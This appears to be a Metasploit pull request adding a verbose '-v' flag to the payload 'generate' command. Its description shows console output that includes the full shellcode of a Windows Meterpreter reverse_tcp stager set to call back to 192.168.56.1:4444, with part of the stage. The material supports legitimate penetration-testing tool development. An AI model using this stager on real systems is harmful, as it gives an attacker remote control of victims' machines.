### PR TITLE
Add generate -v to optionally show payload stage

### DIFF
--- a/lib/msf/base/simple/payload.rb
+++ b/lib/msf/base/simple/payload.rb
@@ -105,8 +105,8 @@ module Payload
             fmt) +
           output
 
-        # If it's multistage, include the second stage too
-        if payload.staged?
+        # If verbose was requested and it's multistage, include the second stage too
+        if opts['Verbose'] && payload.staged?
           stage = payload.generate_stage
 
           # If a stage was generated, then display it

--- a/lib/msf/ui/console/command_dispatcher/payload.rb
+++ b/lib/msf/ui/console/command_dispatcher/payload.rb
@@ -31,6 +31,7 @@ module Msf
             "-k" => [ false, "Preserve the template behavior and inject the payload as a new thread" ],
             "-o" => [ true,  "The output file name (otherwise stdout)" ],
             "-O" => [ true,  "Deprecated: alias for the '-o' option" ],
+            "-v" => [ false, "Verbose output (display stage in addition to stager)" ],
             "-h" => [ false, "Show this message" ],
           )
 
@@ -96,6 +97,7 @@ module Msf
             template     = nil
             plat         = nil
             keep         = false
+            verbose      = false
 
             @@generate_opts.parse(args) do |opt, _idx, val|
               case opt
@@ -131,6 +133,8 @@ module Msf
                 plat = val
               when '-x'
                 template = val
+              when '-v'
+                verbose = true
               when '-h'
                 cmd_generate_help
                 return false
@@ -161,7 +165,8 @@ module Msf
                 'Template'    => template,
                 'Platform'    => plat,
                 'KeepTemplateWorking' => keep,
-                'Iterations' => iter
+                'Iterations' => iter,
+                'Verbose' => verbose
               )
             rescue
               log_error("Payload generation failed: #{$ERROR_INFO}")
@@ -194,7 +199,8 @@ module Msf
               '-p' => [ true                                              ],
               '-k' => [ nil                                               ],
               '-x' => [ :file                                             ],
-              '-i' => [ true                                              ]
+              '-i' => [ true                                              ],
+              '-v' => [ nil                                               ]
             }
             tab_complete_generic(fmt, str, words)
           end


### PR DESCRIPTION
## Why?

The long-standing behavior of the `generate` command was to display both the payload stager and stage, which would often result in output scrolling off the screen. This PR changes the behavior to align with sanity (and `msfvenom`'s behavior).

## `generate` (stager only)

```
msf5 payload(windows/meterpreter/reverse_tcp) > generate
# windows/meterpreter/reverse_tcp - 283 bytes (stage 1)
# https://metasploit.com/
# VERBOSE=true, LHOST=192.168.56.1, LPORT=4444,
# ReverseAllowProxy=false, ReverseListenerThreaded=false,
# StagerRetryCount=10, StagerRetryWait=5, PingbackRetries=0,
# PingbackSleep=30, PayloadUUIDTracking=false,
# EnableStageEncoding=false, StageEncoderSaveRegisters=,
# StageEncodingFallback=true, PrependMigrate=false,
# EXITFUNC=process, AutoLoadStdapi=true,
# AutoVerifySession=true, AutoVerifySessionTimeout=30,
# InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true,
# EnableUnicodeEncoding=false, SessionRetryTotal=3600,
# SessionRetryWait=10, SessionExpirationTimeout=604800,
# SessionCommunicationTimeout=300, PayloadProcessCommandLine=,
# AutoUnhookProcess=false
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89" +
"\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29" +
"\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x38\x01\x68\x02" +
"\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5" +
"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68" +
"\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02" +
"\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00" +
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00" +
"\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6" +
"\x75\xee\xc3"
msf5 payload(windows/meterpreter/reverse_tcp) >
```

## `generate -v` (stager and stage)

```
msf5 payload(windows/meterpreter/reverse_tcp) > generate -v
# windows/meterpreter/reverse_tcp - 283 bytes (stage 1)
# https://metasploit.com/
# VERBOSE=true, LHOST=192.168.56.1, LPORT=4444,
# ReverseAllowProxy=false, ReverseListenerThreaded=false,
# StagerRetryCount=10, StagerRetryWait=5, PingbackRetries=0,
# PingbackSleep=30, PayloadUUIDTracking=false,
# EnableStageEncoding=false, StageEncoderSaveRegisters=,
# StageEncodingFallback=true, PrependMigrate=false,
# EXITFUNC=process, AutoLoadStdapi=true,
# AutoVerifySession=true, AutoVerifySessionTimeout=30,
# InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true,
# EnableUnicodeEncoding=false, SessionRetryTotal=3600,
# SessionRetryWait=10, SessionExpirationTimeout=604800,
# SessionCommunicationTimeout=300, PayloadProcessCommandLine=,
# AutoUnhookProcess=false
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89" +
"\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29" +
"\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x38\x01\x68\x02" +
"\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5" +
"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68" +
"\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02" +
"\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00" +
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00" +
"\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6" +
"\x75\xee\xc3"

# windows/meterpreter/reverse_tcp - 180291 bytes (stage 2)
# https://metasploit.com/
buf =
"\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81" +
[snip]
"\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
msf5 payload(windows/meterpreter/reverse_tcp) >
```

Note that the payload stage is **180,291** bytes.